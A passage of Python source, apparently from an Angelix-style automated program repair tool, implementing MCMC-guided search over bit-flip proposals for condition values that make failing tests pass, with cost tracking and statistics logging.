# e.g., [array([ 0, 2046]), array([0, 0])] for 2 locations
q0_chunks = list(
self.inferrer.chunks(np.copy(q0),
self.inferrer.chunks_in_block)) if len(q0) > 0 else []
# q0_chunks should be idential with the original sample
# logger.debug('q0_chunks: {}'.format(q0_chunks))
# logger.debug('chunks_in_block: {}'.format(self.inferrer.chunks_in_block))
self.inferrer.set_q0(q0_chunks)
q = list(map(self.propose,
zip(q0_chunks, self.inferrer.cur_ebits_list, range(len(q0_chunks)))))
return q
"""
propose a new block for each suspicious location
"""
def propose(self, args: Tuple[np.ndarray, int, int]) -> np.ndarray:
chunk_bits = self.inferrer.chunk_bits
q0_i, bits_i, idx = args
def modifiable_bits_size(chunk_idx):
if chunk_bits * (len(unpadded) - chunk_idx) <= bits_i:
return chunk_bits
else:
rst = bits_i % chunk_bits
assert rst != 0
return rst
q0_i = np.copy(q0_i)
act_chunks_in_block = int(np.ceil(bits_i / chunk_bits))
assert act_chunks_in_block <= len(q0_i)
unpadded = q0_i[len(q0_i) - act_chunks_in_block:len(q0_i)]
pad_len = len(q0_i) - len(unpadded)
if self.config['group_size'] > 1 and \
self.inferrer.scores[idx] < np.random.rand():
# As fault location score is lower, we do not change
# the bits with a higher probability.
q_i = q0_i
elif self.choose_maj():
# flip one bit
logger.debug('flip 1 bit')
range = np.arange(len(unpadded))
if len(range) <= 0:
q_i = q0_i
else:
chunk_idx = np.random.choice(range)
bits_size = modifiable_bits_size(chunk_idx)
kth = np.random.choice(np.arange(bits_size))
unpadded[chunk_idx] = self.flip(unpadded[chunk_idx], kth)
q_i = Bin.pad_zeros(unpadded, pad_len, 0, int)
else:
# flip N bits where N >= 0
range = np.arange(0, bits_i + 1)
if len(range) <= 0:
q_i = q0_i
else:
num_of_flips = np.random.choice(range)
logger.debug('flip {} bits'.format(num_of_flips))
if num_of_flips == 0:
q_i = q0_i
else:
pos_dict = dict()
flipped = 0
while flipped < num_of_flips:
chunk_idx = np.random.choice(np.arange(len(unpadded)))
bits_size = modifiable_bits_size(chunk_idx)
kth = np.random.choice(np.arange(bits_size))
if (chunk_idx, kth) in pos_dict:
continue
pos_dict.update({(chunk_idx, kth): True})
unpadded[chunk_idx] = self.flip(unpadded[chunk_idx], kth)
flipped += 1
q_i = Bin.pad_zeros(unpadded, pad_len, 0, int)
return q_i
def choose_maj(self):
return np.random.choice([True, False], p=[self.one_bit_flip_prob,
1 - self.one_bit_flip_prob])
def flip(self, x, pos):
return x ^ (1 << pos)
class GuidedInferrer(SymbolicInferrer):
def __init__(self, config, tester, load, searchDir, dd_dir, extracted, working_dir):
super().__init__(config, tester, load, searchDir)
self.dd_dir = dd_dir
self.extracted = extracted
self.working_dir = working_dir
self.one_bit_flip_prob = self.config['one_bit_flip_prob']
self.mul_bits_flip_prob = 1 - self.one_bit_flip_prob
self.beta = self.config['mcmc_beta']
self.max_same_cost_iter = self.config['max_same_cost_iter']
self.chunk_bits = self.config['chunk_bits']
self.max_resample = self.config['max_resample']
self.block_expand_factor = self.config['block_expand_factor']
def init_sample(self, seed: List[Tuple[str, Loc, str]]) -> Tuple[List[np.ndarray], List[int]]:
if seed is None:
try:
init_sample, cur_ebits_list = self.extract_start()
except ExtractionFailure as e:
logger.debug('ExtractionFailure: {}'.format(e))
logger.warn('failed to extract the inital sample (use the default sample).')
chunks_ebits_list = list(zip([np.ones(1, dtype=int)] * len(self.c_locs),
[1] * len(self.c_locs)))
init_sample, cur_ebits_list = self.sample_and_ebits(chunks_ebits_list, init=True)
else:
init_sample, cur_ebits_list = self.sample_and_ebit_seq(seed, init=True)
return init_sample, cur_ebits_list
def sample(self, init_sample, sample_shape, args_of_proposal_dist):
if self.config['step_method'] == 'smc':
logger.warning('smc is not supported')
exit(1)
pm.DiscreteUniform('p', 0, 1, shape=sample_shape)
pm.sample(draws=3,
tune=0,
compute_convergence_checks=False,
cores=1, chains=1,
start={'p': init_sample},
progressbar=False,
logger=pymc3_logger,
allow_empty_model=True,
step=pm.SMC(likelihood_logp=self.likelihood_logp,
accept_fun=self.accept_fun,
post_accept_fun=self.post_accept_fun,
# S=mc,
proposal_dist=CustomProposal,
random_walk_mc=True,
args_of_proposal_dist=args_of_proposal_dist))
else:
# The following dist is given only to trigger sampling.
# The actual sampling is performed through CustomProposal.
pm.DiscreteUniform('p', 0, 1, shape=sample_shape)
pm.sample(self.search_max_trials * 50, tune=0,
compute_convergence_checks=False,
cores=1, chains=1,
start={'p': init_sample},
progressbar=False,
logger=pymc3_logger,
allow_empty_model=True,
step=pm.Metropolis(accept_fun=self.accept_fun,
post_accept_fun=self.post_accept_fun,
# S=mc,
proposal_dist=CustomProposal,
random_walk_mc=True,
args_of_proposal_dist=args_of_proposal_dist))
def get_proposal_file(self, seed, file_name):
proposal_dir = self.get_proposal_dir()
proposal_file = join(proposal_dir, file_name + '.json')
proposal_dict = dict()
for c_loc in self.c_locs:
key = reduce((lambda x, y: '{}-{}'.format(x, y)), c_loc)
vals = [int(TraceItem.get_value(x)) for x in seed]
proposal_dict[key] = vals
with open(proposal_file, 'w') as file:
file.write(json.dumps(proposal_dict))
return proposal_file
def repair_cond(self, seed, project, test, locations):
angelic_paths = []
ap_trace_file = None
repeat = 0
explored = 0
sampled = 0
cost_seq = []
ratio_seq = []
accepted_seq = []
dd_elapsed = 0
angelic_found = False
sample_space_exhausted = False
stuck = False
trials_exhuasted = False
ebits_overflown = False
loc_dd_failed = False
ebits_dd_failed = False
args_of_proposal_dist = {'project': project,
'test': test,
'locations': locations,
'working_dir': self.working_dir,
'searchDir': self.searchDir,
'one_bit_flip_prob': self.one_bit_flip_prob,
'mul_bits_flip_prob': self.mul_bits_flip_prob,
'inferrer': self,
'config': self.config}
logger.debug('seed: {}'.format(seed))
if len(seed) == 0:
logger.debug('skip for an empty seed')
return angelic_paths, ap_trace_file
init_sample, self.cur_ebits_list = self.init_sample(seed)
sample_shape = np.shape(init_sample)
logger.info('init sample: {}'.format(init_sample))
inference_start_time = time.time()
while repeat < self.max_resample:
with pm.Model() as model:
try:
self.sample(init_sample, sample_shape, args_of_proposal_dist)
# trace.report._run_convergence_checks(trace, model)
break
except AngelicValsFound as e:
angelic_found = True
logger.info('found an angelic path for test \'{}\''.format(test))
logger.debug('trace_file: {}'.format(e.trace_file))
dd_start_time = time.time()
seed = Trace.parse_trace_file(e.trace_file)
angelic_sample_and_ebit_seq: Tuple[Sample, EBitsSeq] = \
self.sample_and_ebit_seq(seed, allow_expand=True)
try:
if self.config['skip_dd']:
raise LocDDFailure
seq1 = angelic_sample_and_ebit_seq
seq2 = self.init_sample_and_ebit_seq
if np.array_equal(seq1[0], seq2[0]) and seq1[1] == seq2[1]:
raise LocDDFailure
refine = AngelicForestRefine(self, self.project, test, self.environment,
self.dd_dir, self.locations, self.c_locs,
self.run_test)
angelic_paths, ap_trace_file = refine(angelic_sample_and_ebit_seq,
self.init_sample_and_ebit_seq,
e.trace_file)
except LocDDFailure:
ap_trace_file = e.trace_file
angelic_paths = self.get_angelic_paths(ap_trace_file,
self.c_locs,
angelic_sample_and_ebit_seq[1])
loc_dd_failed = True
except EbitsDDFailure as ddf:
ap_trace_file = e.trace_file
angelic_paths = self.get_angelic_paths(ap_trace_file,
ddf.min_locs, ddf.min_init_ebits)
ebits_dd_failed = True
explored += e.unique_trial
sampled += e.total_trial
cost_seq.extend(e.cost_seq)
ratio_seq.extend(e.ratio_seq)
accepted_seq.extend(e.accepted_seq)
dd_end_time = time.time()
dd_elapsed += dd_end_time - dd_start_time
break
except SampleSpaceExhausted as e:
logger.info('Sample space exhausted: size={}, samples={}'.
format(e.sample_space_size, e.samples))
explored += e.unique_trial
sampled += e.total_trial
cost_seq.extend(e.cost_seq)
ratio_seq.extend(e.ratio_seq)
accepted_seq.extend(e.accepted_seq)
sample_space_exhausted = True
break
except Stuck as e:
logger.info('Stuck in the same cost: {}'.format(e.cost))
explored += e.unique_trial
sampled += e.total_trial
cost_seq.extend(e.cost_seq)
ratio_seq.extend(e.ratio_seq)
accepted_seq.extend(e.accepted_seq)
stuck = True
break
except TrialsExhausted as e:
logger.info('All {} trials are exhausted'.format(self.search_max_trials))
explored += e.unique_trial
sampled += e.total_trial
cost_seq.extend(e.cost_seq)
ratio_seq.extend(e.ratio_seq)
accepted_seq.extend(e.accepted_seq)
trials_exhuasted = True
break
except EbitsOverFlow as e:
logger.info('Ebits {} is too large'.format(e.ebits))
# adjust sampe_shape
new_chunks_in_block = \
int(np.ceil(e.ebits / self.chunk_bits)) * self.block_expand_factor
sample_shape = (sample_shape[0], new_chunks_in_block)
# adjust self.chunks_in_block
self.init_chunks_in_block(new_chunks_in_block)
# adjust init_sample
init_sample = [self.pad_chunk(chunk) for chunk in e.last_sample]
logger.info('Restart sampling in a larger sample space')
logger.info('start vals: {}'.format(init_sample))
logger.info('sample shape: {}'.format(sample_shape))
explored += e.unique_trial
sampled += e.total_trial
cost_seq.extend(e.cost_seq)
ratio_seq.extend(e.ratio_seq)
accepted_seq.extend(e.accepted_seq)
ebits_overflown = True
repeat += 1
continue
inference_end_time = time.time()
inference_elapsed = inference_end_time - inference_start_time
statistics.data['time']['inference'] += inference_elapsed
statistics.data['time']['dd'] += dd_elapsed
iter_stat = dict()
iter_stat['locations'] = locations
iter_stat['test'] = test
iter_stat['time'] = dict()
iter_stat['time']['mcmc'] = inference_elapsed - dd_elapsed
iter_stat['time']['dd'] = dd_elapsed
iter_stat['paths'] = dict()
iter_stat['paths']['explored'] = explored
iter_stat['paths']['sampled'] = sampled
iter_stat['paths']['angelic_found'] = angelic_found
iter_stat['paths']['angelic'] = len(angelic_paths)
iter_stat['paths']['sample_space_exhausted'] = sample_space_exhausted
iter_stat['paths']['trials_exhuasted'] = trials_exhuasted
iter_stat['paths']['ebits_overflown'] = ebits_overflown
iter_stat['paths']['loc_dd_failed'] = loc_dd_failed
iter_stat['paths']['ebits_dd_failed'] = ebits_dd_failed
iter_stat['paths']['stuck'] = stuck
iter_stat['paths']['cost'] = cost_seq
iter_stat['paths']['ratio'] = ratio_seq
iter_stat['paths']['accepted'] = accepted_seq
statistics.data['iterations']['guided'].append(iter_stat)
statistics.save()
return angelic_paths, ap_trace_file
# @profile
def __call__(self, project, test, locations, dump, score_dict,
seed: TraceFile = None, ptr_seed=None) -> Tuple[List[AngelicPath], TraceFile]:
logger.info('inferring specification for test \'{}\' through guided search'.format(test))
self.project = project
self.test = test
self.dump = dump
self.score_dict = score_dict
self.locations = sorted(locations)
# cond locs
self.c_locs = [TraceItem.get_location(x) for x in self.locations
if DC.is_loop_cond(x[0]) or DC.is_if_cond(x[0])]
# rhs locs
self.rhs_locs = [TraceItem.get_location(x) for x in self.locations
if DC.is_rhs(x[0])]
# ptr locs
self.ptr_locs = [TraceItem.get_location(x) for x in self.locations
if DC.is_pointer(x[0])]
# fault localization scores
self.scores = [score_dict[loc] for loc in self.locations]
self.environment = dict(os.environ)
self.cost_dict = dict()
self.cur_ebits_list = []
self.same_cost_count = 0
self.trial_num = 0
self.is_first_trial = True
self.unique_trial = 0
self.max_sample_space_size = 0
self.cost_seq = []
self.accepted_seq = []
self.ratio_seq = []
self.search_max_trials = self.config['search_max_trials']
if len(self.rhs_locs) > 0:
from klee_inference import KleeInferrer
rhs_inferrer = KleeInferrer(self)
rhs_inferrer.init_suspicious_rhses()
angelic_paths, ap_trace_file = rhs_inferrer.repair_rhs(project, test, dump,
locations)
elif len(self.ptr_locs) > 0:
from ptr_inference import PtrInferrer
ptr_inferrer = PtrInferrer(self)
angelic_paths, ap_trace_file = ptr_inferrer.repair_ptr(ptr_seed, project,
test, locations)
else:
angelic_paths, ap_trace_file = self.repair_cond(seed, project, test, locations)
return angelic_paths, ap_trace_file
def check_sample_space(self):
# logger.debug('cur_ebits_list: {}'.format(self.cur_ebits_list))
sample_space_size = reduce(lambda x, y: x * y,
[2**bits for bits in self.cur_ebits_list])
if sample_space_size > self.max_sample_space_size:
self.max_sample_space_size = sample_space_size
keys = self.cost_dict.keys()
matches = [key for key in keys if list(map(len, key)) == self.cur_ebits_list]
return self.max_sample_space_size, matches, len(matches) / self.max_sample_space_size
'''
run the program with qs
and returns an acceptance ratio
'''
def accept_fun(self, qs, q0s):
self.trial_num += 1
logger.info('trial #{}'.format(self.trial_num))
if len(qs) > 0:
sample_space_size, samples, usage_rate = self.check_sample_space()
cur_sample_size = len(samples)
logger.info('used {}% of sample space'.format(100 * usage_rate))
if cur_sample_size >= sample_space_size:
logger.debug('cur_sample_size: {}'.format(cur_sample_size))
logger.debug('sample_space_size: {}'.format(sample_space_size))
logger.debug('samples: {}'.format(samples))
raise SampleSpaceExhausted(sample_space_size, samples,
self.unique_trial, self.trial_num,
self.cost_seq, self.ratio_seq, self.accepted_seq)
try:
q0s = self.q0
self.old_ebits_list = self.cur_ebits_list.copy()
# logger.debug('[accept_fun] q0s: {} / {} / {}'.format(q0s, self.cur_ebits_list,
# np.shape(q0s)))
# logger.debug('[accept_fun] qs: {} / {} / {}'.format(qs, self.cur_ebits_list,
# np.shape(qs)))
old_cost, _, _ = self.cost(q0s)
new_cost, new_qs, is_cached_cost = self.cost(qs)
# logger.debug('new qs: {} / {} / {}'.format(new_qs,
# self.cur_ebits_list, np.shape(new_qs)))
self.cost_seq.append(new_cost)
except ChunkOverFlow as cof:
raise EbitsOverFlow(cof.ebits, q0s, self.unique_trial, self.trial_num,
self.cost_seq, self.ratio_seq, self.accepted_seq)
# update qs
for i in range(len(qs)):
qs[i] = new_qs[i]
# logger.info('updated qs: {} / {} / {}'.format(qs, self.cur_ebits_list, np.shape(qs)))
for ebits in self.cur_ebits_list:
if ebits > np.shape(qs)[1] * self.chunk_bits:
raise EbitsOverFlow(ebits, q0s, self.unique_trial, self.trial_num,
self.cost_seq, self.ratio_seq, self.accepted_seq)
if old_cost is None:
log_ratio = 0
elif new_cost is None:
log_ratio = np.log(0.5)
else:
if not is_cached_cost and abs(old_cost - new_cost) < self.config['epsilon']:
if not self.config['always_accept']:
if self.same_cost_count >= self.max_same_cost_iter:
raise Stuck(new_cost, self.unique_trial, self.trial_num,
self.cost_seq, self.ratio_seq, self.accepted_seq)
self.same_cost_count += 1
log_ratio = -self.beta * (new_cost - old_cost)
log_p_old_to_new = 0
log_p_new_to_old = 0
if self.old_ebits_list != self.cur_ebits_list:
logger.debug('old ebits list: {}'.format(self.old_ebits_list))
logger.debug('new ebtis list: {}'.format(self.cur_ebits_list))
for i in range(len(self.cur_ebits_list)):
old_chunks = q0s[i]
old_bits = self.old_ebits_list[i]
new_chunks = qs[i]
new_bits = self.cur_ebits_list[i]
if old_bits == new_bits:
continue
else:
prob_new_to_old = self.prob_of_transfer(np.copy(new_chunks), new_bits,
np.copy(old_chunks), old_bits)
prob_old_to_new = self.prob_of_transfer(np.copy(old_chunks), old_bits,
np.copy(new_chunks), new_bits)
log_p_new_to_old += prob_new_to_old
log_p_old_to_new += prob_old_to_new
if log_p_old_to_new != log_p_new_to_old:
log_ratio = log_ratio + log_p_new_to_old - log_p_old_to_new
log_ratio = np.minimum(0, log_ratio)
logger.info('old cost: {}'.format(old_cost))
logger.info('new cost: {}'.format(new_cost))
logger.info('all costs: {}'.format(sorted(set(self.cost_dict.values()))))
logger.info('accept ratio: {}'.format(np.exp(log_ratio)))
self.ratio_seq.append(np.exp(log_ratio))
if cur_sample_size == sample_space_size - 1:
log_ratio = 0
if self.config['always_accept']:
# no more choice to make. we do not want to be stuck.
logger.info('accept. this is the last choice')
log_ratio = 0
return log_ratio
def post_accept_fun(self, accepted):
self.accepted_seq.append(accepted)
if not accepted:
self.cur_ebits_list = self.old_ebits_list
if self.trial_num >= self.search_max_trials:
raise TrialsExhausted(self.unique_trial, self.trial_num,
self.cost_seq, self.ratio_seq, self.accepted_seq)
def likelihood_logp(self, sample):
return 1
'''
Prob that chunk1 is tanferred to chunk2 in the MCMC sample space
'''
def prob_of_transfer(self, block1, ebits1, block2, ebits2):
if ebits1 == ebits2:
flip_count = Bin.flip_count_between_blocks(block1, block2)
return self.flip_prob(flip_count, ebits1)
elif ebits1 < ebits2:
delta = ebits2 - ebits1
shifted_block2 = Bin.rshift(block2, delta, self.chunk_bits)
flip_count = Bin.flip_count_between_blocks(block1, shifted_block2)
return self.flip_prob(flip_count, ebits1)
else:
assert ebits1 > ebits2
delta = ebits1 - ebits2
shifted_block1 = Bin.rshift(block1, delta, self.chunk_bits)
flip_count = Bin.flip_count_between_blocks(shifted_block1, block2)
p = 0
for i in range(delta):
p += sc.special.binom(delta, i) * self.flip_prob(flip_count + i, ebits1)
return p
def rshift(self, block, n):
def get_next_carry(v, n_in_chunk):
mask_bits = Bin.ones(n_in_chunk)
return (v & mask_bits) << (self.chunk_bits - n_in_chunk)
chunk_shift = int(np.floor(n / self.chunk_bits))
block_copy = np.copy(block[0:len(block) - chunk_shift])
n_in_chunk = n % self.chunk_bits
if n_in_chunk != 0:
cur_carry = 0
for idx, chunk in enumerate(block):
next_carry = get_next_carry(chunk, n_in_chunk)
block_copy[idx] = (chunk >> n_in_chunk) | cur_carry
cur_carry = next_carry
return block_copy
'''
Prob that 'flips' bits in ebits are flippsed
'''
def flip_prob(self, flips, ebits):
if ebits == 0:
return self.mul_bits_flip_prob
if flips == 1:
# prob that a parituclar bit is flipped
p = self.one_bit_flip_prob / ebits
p += self.mul_bits_flip_prob / ((1 + ebits) * ebits)
else:
# prob that the number of flipped bits are "flips"
# possibility: none is flippled, two bits are flipped, ..., "bits" bits are flipped
p = self.mul_bits_flip_prob / ebits
p /= (1 + ebits)
# prob that a particular "flips" bits are flipped
p /= sc.special.binom(ebits, flips)
return p
def flip_count_between_chunks(self, c1, c2):
min_len = min(len(c1), len(c2))
if len(c1) != min_len:
# assert len(c1) > min_len
start = len(c1) - min_len
c1 = c1[start:]
if len(c2) != min_len:
# assert len(c1) > min_len
start = len(c2) - min_len
c2 = c2[start:]
count = 0
for i in range(len(c1)):
count += self.flip_count(c1[i], c2[i])
return count
'''
Return count of bit differences betwee a and b
'''
def flip_count(self, a, b):
def countSetBits(n):
count = 0
while n:
count += n & 1
n >>= 1
return count
rst = countSetBits(a ^ b)
return rst
def update_cost(self, sample, cost):
if cost is not None:
key = self.sample_to_key(sample, self.cur_ebits_list)
if key != ('',):
logger.debug('store the cost of {} [actual]'.format(key))
self.cost_dict.update({key: cost})
def update_cost_of_key(self, key, cost):
if cost is not None:
if key != ('',):
logger.debug('store the cost of {} [key]'.format(key))
self.cost_dict.update({key: cost})
def cost(self, sample) -> Tuple[Cost, Sample]:
key: Tuple[str] = self.sample_to_key(sample, self.cur_ebits_list)
logger.debug('search for the cost of {}'.format(key))
# check if the sample is already tried before
if key in self.cost_dict:
logger.debug('{} cached'.format(key))
cost = self.cost_dict.get(key)
act_sample = sample
is_cached_cost = True
else:
act_sample, self.cur_ebits_list, cost = self.new_cost(key, sample)
is_cached_cost = False
# TODO: if sample is shorter than actual sample,
# there is no guarantee on deterministic behavior.
# better to learn about deterministic behavior.
# self.update_cost_of_key(key, cost)
self.update_cost(act_sample, cost)
# matches = [k for k in self.cost_dict.keys() if self.is_prefix(k, key)]
# if len(matches) > 0:
# logger.debug('{} cached (prefix) by {}'.format(key, matches[0]))
# cost = self.cost_dict.get(matches[0])
# act_sample = sample
# is_cached_cost = True
# else:
# act_sample, self.cur_ebits_list, cost = self.new_cost(key, sample)
# is_cached_cost = False
# # TODO: if sample is shorter than actual sample,
# # there is no guarantee on deterministic behavior.
# # better to learn about deterministic behavior.
# self.update_cost_of_key(key, cost)
# self.update_cost(act_sample, cost)
return cost, act_sample, is_cached_cost
'''
return True if t1 is the prefix of t2
'''
def is_prefix(self, t1, t2):
def _is_prefix(bv, pair):
return bv and pair[1].startswith(pair[0])
# logger.debug('t1: {}'.format(t1)
# logger.debug('t2: {}'.format(t2)
assert len(t1) == len(t2)
return reduce(_is_prefix, zip(t1, t2), True)
def new_cost(self, key, sample):
logger.debug('[new_cost] key: {}'.format(key))
# logger.debug('[new_cost] sample: {}'.format(sample))
sample_bits = list(map(lambda x: [int(x[i:i + 1])
for i in range(0, len(x))], key))
# logger.debug('[new_cost] sample_bits: {}'.format(sample_bits))
proposal_file, trace_file, cost_file, act_out_file = self.trial(sample_bits)
self.remove_file(trace_file)
self.remove_file(cost_file)
self.remove_file(act_out_file)
self.environment['ANGELIX_LOAD_JSON'] = proposal_file
self.environment['ANGELIX_TRACE_AFTER_LOAD'] = trace_file
self.environment['ANGELIX_COST_FILE'] = cost_file
self.environment['ANGELIX_ACT_OUT'] = act_out_file
self.environment['ANGELIX_COMPUTE_COST'] = 'YES'
self.environment['PENALTY1'] = self.config['penalty1']
self.environment['PENALTY2'] = self.config['penalty2']
self.environment['ANGELIX_DEFAULT_NON_ZERO_COST'] = self.config['default_non_zero_cost']
self.environment['ANGELIX_ERROR_COST'] = self.config['error_cost']
self.environment['ANGELIX_WARNING_COST'] = self.config['warning_cost']
self.environment['CC'] = 'angelix-compiler --test' if self.config['use_gcc'] \
else 'angelix-compiler --klee'
if self.config['use_gcc']:
if self.config['use_frontend_for_test']:
self.environment['CC'] = 'angelix-compiler --frontend'
else:
self.environment['CC'] = 'angelix-compiler --test'
else:
self.environment['CC'] = 'angelix-compiler --klee'
try:
passed = self.run_test(self.project, self.test, env=self.environment)
except subprocess.TimeoutExpired:
passed = False
self.unique_trial += 1
if passed is True:
self.cost_seq.append(0)
raise AngelicValsFound(trace_file, self.unique_trial, self.trial_num,
self.cost_seq, self.ratio_seq, self.accepted_seq)
try:
logger.debug('trace_file: {}'.format(trace_file))
trace = Trace.parse_trace_file(trace_file)
if len(trace) > self.config['max_bits']:
logger.warning('actual bits ({}) exceeds the maximum allowed bits ({})'.
format(len(trace), self.config['max_bits']))
act_sample = sample
ebits_list = self.cur_ebits_list
elif self.config['fixed_bv_len']:
act_sample = sample
ebits_list = self.cur_ebits_list
else:
act_sample, ebits_list = self.sample_and_ebit_seq(trace)
except ExtractionFailure:
ebits_list = self.cur_ebits_list
logger.debug('cost file: {}'.format(cost_file))
cost = self.extract_cost(cost_file)
logger.debug('extracted cost: {}'.format(cost))
return act_sample, ebits_list, cost
def extract_cost(self, cost_file) -> int:
if self.config['random_cost']:
range = np.arange(0, self.config['default_max_cost'] + 1)
return np.random.choice(range)
if not os.path.exists(cost_file):
logger.warning('cost file missing: {}'.format(cost_file))
cost = self.config['default_max_cost']
return cost
try:
cost_txt = subprocess.check_output('cat ' + cost_file, shell=True).decode('ascii')
except subprocess.CalledProcessError:
logger.warning('cost file missing: {}'.format(cost_file))
cost = self.config['default_max_cost']
return cost
try:
cost = float(cost_txt)
except ValueError:
cost_txt = cost_txt.replace('\n', '')
if cost_txt == 'max_cost':
cost = self.max_cost()
logger.warning('extract the current max cost: {}'.format(cost))
else:
logger.warning('unrecognized cost {} in {}'.format(cost_txt, cost_file))
cost = None
return cost
def max_cost(self):
return max(self.cost_dict.values(), default=self.config['default_max_cost'])
def get_proposal_dir(self):
if not os.path.exists(self.searchDir[self.test]):
mkdir(self.searchDir[self.test])
proposal_dir = join(self.searchDir[self.test], 'proposal')
if not os.path.exists(proposal_dir):
mkdir(proposal_dir)
return proposal_dir
def trial(self, proposal: List[List[int]]):
logger.debug('proposal: {}'.format(proposal))
logger.debug('locations: {}'.format(self.c_locs))
assert len(proposal) == len(self.c_locs)
proposal_dir = self.get_proposal_dir()
proposal_file = join(proposal_dir, 'proposal' + str(self.trial_num) + '.json')
proposal_dict = dict()
for idx, c_loc in enumerate(self.c_locs):
key = reduce((lambda x, y: '{}-{}'.format(x, y)), c_loc)
proposal_dict[key] = proposal[idx]
with open(proposal_file, 'w') as file:
file.write(json.dumps(proposal_dict))
trace_dir = join(self.searchDir[self.test], 'trace')
if not os.path.exists(trace_dir):
mkdir(trace_dir)
cur_trace_file = join(trace_dir, 'trace' + str(self.trial_num))
cost_dir = join(self.searchDir[self.test], 'cost')
if not os.path.exists(cost_dir):
mkdir(cost_dir)
cost_file = join(cost_dir, 'cost' + str(self.trial_num))
act_out_dir = join(self.searchDir[self.test], 'act_out')
if not os.path.exists(act_out_dir):
mkdir(act_out_dir)
act_out_file = join(act_out_dir, 'act_out' + str(self.trial_num))
return proposal_file, cur_trace_file, cost_file, act_out_file
def to_loc_id_str(self, loc_id: tuple):
reduce((lambda x, y: '{}-{}'.format(x, y)), loc_id)
def sample_to_key(self, sample, ebits_list):
def block_to_bin_str(block, ebits):
act_chunks_in_block = int(np.ceil(ebits / self.chunk_bits))
unpadded_block = block[len(block) - act_chunks_in_block:len(block)]
bin = ""
for idx, chunk in enumerate(unpadded_block):
if idx == 0:
bin += Bin.bin_str(chunk, ebits % self.chunk_bits)
else:
bin += Bin.bin_str(chunk, self.chunk_bits)
return bin
return tuple([block_to_bin_str(block, ebits)
for block, ebits in zip(sample, ebits_list)])
def sample_and_ebit_seq(self, trace,
init=False,
allow_expand=False) -> Tuple[Sample, EBitsSeq]:
loc_idx = 1
val_idx = 2
def _extract(loc: Tuple[int, int, int, int]):
extracted_bits = [t[val_idx] for t in trace if t[loc_idx] == loc]
bits = list(map(Bin.normalize_bit, extracted_bits))
val_chunks = self.bits_to_chunks(bits)
return val_chunks, len(extracted_bits)
vals_ebits_list = [_extract(loc) for loc in self.c_locs]
return self.sample_and_ebits(vals_ebits_list, init=init, allow_expand=allow_expand)
def extract_start(self) -> Tuple[Sample, EBitsSeq]:
trace_file = join(self.working_dir, "trace", self.test)
logger.debug('trace_file: {}'.format(trace_file))
val_idx = 2
def _extract(loc):
pattern = '\"^[IL], ' + reduce((lambda x, y: '{} {}'.format(x, y)), loc) + ',\"'
try:
lines = subprocess.check_output('grep ' + pattern + ' ' + trace_file,
shell=True).decode('ascii').splitlines()
except subprocess.CalledProcessError:
# lines = []
raise ExtractionFailure
extracted_bits = list(map(lambda line: line.split(',')[val_idx].strip(), lines))
bits = list(map(Bin.normalize_bit, extracted_bits))
val_chunks = self.bits_to_chunks(bits)
return np.array(val_chunks), len(lines)
chunks_ebits_list = [_extract(loc) for loc in self.c_locs]
logger.debug('chunks_ebits_list: {}'.format(chunks_ebits_list))
return self.sample_and_ebits(chunks_ebits_list, init=True)
'''
Each control sequence consists of an array of bits (i.e., a seq-chunk)
and the number of enabled bits (i.e., ebits).
The actual enabled bits are the last N bits of the seq-chunk where N is ebits.
'''
def sample_and_ebits(self, block_ebits_list: List[BlockEbits],
init=False, allow_expand=False) -> Tuple[Sample, EBitsSeq]:
block = [pair[0] for pair in block_ebits_list]
ebits = [pair[1] for pair in block_ebits_list]
if init:
if len(block) == 0:
self.init_chunks_in_block(0)
else:
self.init_chunks_in_block(
int(np.ceil(max(map(len, block)) * self.block_expand_factor)))
if allow_expand:
new_chunks_in_block = max(self.chunks_in_block, max(map(len, block)))
logger.debug('old chunks_in_block: {}'.format(self.chunks_in_block))
logger.debug('new chunks_in_block: {}'.format(new_chunks_in_block))
self.init_chunks_in_block(new_chunks_in_block)
sample = []
for idx, chunk in enumerate(block):
if len(chunk) > self.chunks_in_block:
logger.info('ChunkOverFlow')
# logger.info('chunk = {}'.format(chunk))
logger.info('chunk len = {}'.format(len(chunk)))
logger.info('chunk size = {}'.format(self.chunks_in_block))
logger.info('ebits = {}'.format(block_ebits_list[idx][1]))
assert len(chunk) <= self.config['max_bits']
raise ChunkOverFlow(block_ebits_list[idx][1])
else:
sample.append(self.pad_chunk(chunk))
return sample, ebits
def get_angelic_paths(self, trace_file, locs: List[Location], ebits_list: List[Ebits]):
assert len(locs) == len(ebits_list)
loc_count_dict: Dict[Location, int] = dict()
for loc in locs:
loc_count_dict.update({loc: 0})
loc_ebits_dict: Dict[Location, int] = dict()
for idx, loc in enumerate(locs):
loc_ebits_dict.update({loc: ebits_list[idx]})
spec_dict = dict()
with open(trace_file) as f:
for _, line in enumerate(f):
try:
commas = line.count(', ')
if commas == 3:
dc, raw_loc, angelic, ctxt = line.split(', ', maxsplit=3)
elif commas == 2:
dc, raw_loc, angelic = line.split(', ', maxsplit=2)
ctxt = None
elif commas == 4:
dc, raw_loc, angelic, ctxt, rest = line.split(', ', maxsplit=4)
else:
raise Exception('Ill-formed line: {}'.format(line))
except ValueError as e:
logger.warning('failed to parse line: {}'.format(line))
raise e
loc = Trace.parseLoc(raw_loc)
if loc not in locs:
continue
if loc_count_dict[loc] >= loc_ebits_dict[loc]:
continue
loc_count_dict.update({loc: loc_count_dict[loc] + 1})
if spec_dict.get(loc) is None:
spec_dict[loc] = [(True if int(angelic) == 1 else False,
None,
Trace.parseCtxt(ctxt))]
else:
spec_dict[loc].append((True if int(angelic) == 1 else False,
None,
Trace.parseCtxt(ctxt)))
return [spec_dict]
'''
The number of elements in a seq-chunk.
'''
def init_chunks_in_block(self, size):
self.chunks_in_block = size
def pad_chunk(self, chunk):
assert len(chunk) <= self.chunks_in_block
if len(chunk) < self.chunks_in_block:
pad_len = self.chunks_in_block - len(chunk)
return Bin.pad_zeros(chunk, pad_len, 0, int)
else:
return np.array(chunk)
def bits_to_chunks(self, bits):
# logger.debug('[bits_to_chunks] bits: {}'.format(bits))
pad_len = (self.chunk_bits - (len(bits) % self.chunk_bits)) % self.chunk_bits
padded_bits = Bin.pad_zeros(bits, pad_len, 0, str)
bits_chunks = list(self.chunks(padded_bits, self.chunk_bits))
val_chunks = list(map(self.bit_to_val, bits_chunks))
return val_chunks
def bit_to_val(self, bits):
# logger.debug('[bit_to_val] bits: {}'.format(bits))
bitstr = ''.join(bits)
val = int(bitstr, 2)
return val
'''
Given a flattened list, return a list of chunks, and each chunk
has 'size' elements.
'''
def chunks(self, lst, size):
for i in range(0, len(lst), size):
yield lst[i:i + size]
def remove_file(self, f):
if os.path.exists(f):
os.remove(f)
def set_q0(self, q0: Sample):
